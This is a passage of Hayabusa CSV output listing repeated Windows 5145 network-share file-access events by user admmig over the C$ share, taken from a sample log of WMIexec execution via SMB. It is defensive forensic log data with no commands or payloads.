0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.741 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#\2abf386e286ec43711933fbe3e652014 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.756 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.756 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#\6ef9bbadb5c7087da45798a762683eeb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.756 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.756 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#\ed68489987b413410ccb94c6e704f6b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.772 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.787 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\183eaaded316165bfbd32a991e4e8c8a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.787 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Security | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.787 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Security\ba6ea4732f569e0674d6a43a82de5cc2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:30.787 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.787 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#\09e0258d6e4a9d467c32dc8ac58766f2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.787 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.787 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#\c97638c574cae07911907fa19e2aeedd | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.803 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.819 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#\e9302436a2c607db888bcb3b14ebba8e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.834 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.834 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\5e015d37aa3fdc75648e9d00d44d13ac | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.850 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.866 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#\3c06d012b88601107a4449fb04067a20 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.882 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.882 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#\67f143e1f5d81dae33879b84e0035cad | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.906 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.906 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#\03d76bf2a39a57e8bed74e782c62fd1c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.906 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:30.906 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\ee53227bcc4430088d0b560752c1cd02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.906 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.906 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\39bc23d9592ef276c70a36ef0311070a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\4c3126aec3364546e4ade89c24c4e742 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\6d5f82d8178e3d8e9931e70dce584863 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\95c749867e5f72a09ed1e59a57931301 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.922 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web\90285827b1300835ca1aaff1dff83a01 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.938 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: 
admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.938 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#\3dde15282321aa41c609dc7f7a5f1af5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.938 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.938 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#\61d489d8a768782ce394f299dcc0e4bb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 
11:32:30.969 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.969 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#\f2c2cff3fa34c990079298396b1ec1fc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.000 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.000 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\4b7763786015950c44dbba0ff26b883e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows 
Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.016 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.016 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#\af89139de3b87146c705fa989eeaa4b1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.031 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.031 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#\db42d61826797328b8b368348c6b3f13 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.063 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.063 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#\9de316f43fe18621a13deefe7dbbbc27 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.078 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.094 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#\5a669ebdf74fb2c8f0d8148b4f79b9a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.094 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.094 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 